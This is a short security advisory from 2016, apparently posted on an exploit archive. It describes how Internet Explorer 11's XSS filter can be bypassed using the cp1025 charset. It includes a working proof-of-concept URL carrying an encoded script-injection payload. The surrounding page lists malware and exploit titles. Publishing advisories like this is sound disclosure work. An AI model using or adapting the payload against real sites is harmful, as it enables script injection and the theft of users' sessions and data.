Microsoft Internet Explorer 11 XSS Filter Bypass

Posted on 13 June 2016

#Vulnerability: IE 11 XSS Filter Bypass
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAInfoSec
#Website: http://rafayhackingarticles.net
#version: Latest

Description

Internet explorer 11 Suffers from a XSS Filter bypass using cp1025
charset. This is highly effective when the charset has not been set by
the webmaster.
The issue occurs due to the fact that in the regular expressions
authors are trying to filter "http-equiv" instead of filtering out the
"<meta charset" keyword.

Proof of Concept

The following is the Proof of concept:
http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20